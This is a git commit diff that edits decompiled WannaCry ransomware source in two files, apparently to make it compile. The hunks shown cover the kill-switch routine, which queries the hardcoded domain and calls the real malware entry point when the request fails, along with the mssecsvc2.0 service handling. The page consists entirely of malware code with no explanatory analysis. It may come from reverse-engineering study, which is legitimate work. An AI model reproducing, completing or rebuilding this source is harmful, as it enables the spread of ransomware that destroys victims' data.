Starting combination file

autun12 · Nov 11, 2019 · 5c85c49 · 5c85c49
1 parent 0fb56ce
commit 5c85c49
Show file tree

Hide file tree

Showing 2 changed files with 15 additions and 24 deletions.
diff --git a/wannacry.c b/wannacry.c
@@ -1,6 +1,3 @@
-#include <string.h>
-#include <stdio.h>
-
 typedef unsigned char   undefined;
 
 typedef unsigned int    ImageBaseOffset32;
@@ -6921,6 +6918,7 @@ void wannacry_real_entry(void) {
 
   hSCManager = OpenSCManagerA((LPCSTR)0x0,(LPCSTR)0x0,0xf003f);
   if (hSCManager != (SC_HANDLE)0x0) {
+    //s_mssecsvc2_0_004312fc = "mssecsvc2.0"
     hSCObject = OpenServiceA(hSCManager,s_mssecsvc2_0_004312fc,0xf01ff);
     if (hSCObject != (SC_HANDLE)0x0) {
       FUN_00407fa0(hSCObject,0x3c);
@@ -6952,19 +6950,15 @@ int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nC
 
   killswitch_url_copy = killswitch_url_buffer;
 
-  //strncpy(killswitch_url_copy, killswitch_url, 14);
-  while (i != 0) {
-    i = i + -1;
-    *(undefined4 *)killswitch_url_copy = *(undefined4 *)killswitch_url;
-    killswitch_url = killswitch_url + 4;
-    killswitch_url_copy = killswitch_url_copy + 4;
-  }
+  strncpy(killswitch_url_copy, killswitch_url, 14);
+
 
   *killswitch_url_copy = *killswitch_url;
-  InternetOpenA((LPCSTR)0x0, 1, (LPCSTR)0x0, (LPCSTR)0x0, 0);
-  hinternet_return = InternetOpenUrlA(hInternet, killswitch_url_buffer, (LPCSTR)0x0, 0, 0x84000000, 0);
+  InternetOpenA(NULL, 1, NULL, NULL, 0);
+  hinternet_return = InternetOpenUrlA(hInternet, killswitch_url_buffer, NULL, 0, 0x84000000, 0);
 
-  if (hinternet_return == (HINTERNET)0x0) {
+  //if url request fails
+  if (hinternet_return == NULL) {
     InternetCloseHandle(hInternet);
     InternetCloseHandle(0);
     wannacry_real_entry();

diff --git a/wannacryretdec.c b/wannacryretdec.c
@@ -5519,28 +5519,25 @@ int32_t function_408090(void) {
     *((int32_t *)(v3 + 8)) = (int32_t)&(g11);
     *((int32_t *)(g9 + 16)) = 0;
     *((int32_t *)(g9 + 20)) = 0;
-    StartServiceCtrlDispatcherA(hSCObject2);
-
-    return;
+    return (StartServiceCtrlDispatcherA)(hSCObject2);
 }
 
 // Address range: 0x408140 - 0x4081cb
-// int32_t function_408140(int32_t a1)
-int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow) {
+int32_t function_408140(int32_t a1) {
     int32_t v1 = 0; // bp-80
     (__asm_rep_movsd_memcpy)((char *)&(v1), "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 14);
     char * v2 = NULL; // bp-100
-    HINTERNET hinternet = InternetOpenA(NULL, 1, NULL, NULL, 0); // 0x40817b
-    HINTERNET hinternet_return = InternetOpenUrlA(hinternet, (char *)&(v2), NULL, 0, -0x7c000000, 0); // 0x408194
+    int32_t * v3 = (InternetOpenA)(NULL, 1, NULL, NULL, 0); // 0x40817b
+    int32_t * v4 = (InternetOpenUrlA)(v3, (char *)&(v2), NULL, 0, -0x7c000000, 0); // 0x408194
     (InternetCloseHandle)(v3);
-    if ((hinternet_return != NULL)) {
+    if ((v4 != NULL)) {
         // 0x4081bc
-        InternetCloseHandle(hinternet_return);
+        (InternetCloseHandle)(v4);
         return 0;
     }
     // 0x4081a7
-    InternetCloseHandle(NULL);
-    function_408090();
+    (InternetCloseHandle)(NULL);
+    (function_408090)();
     return 0;
 }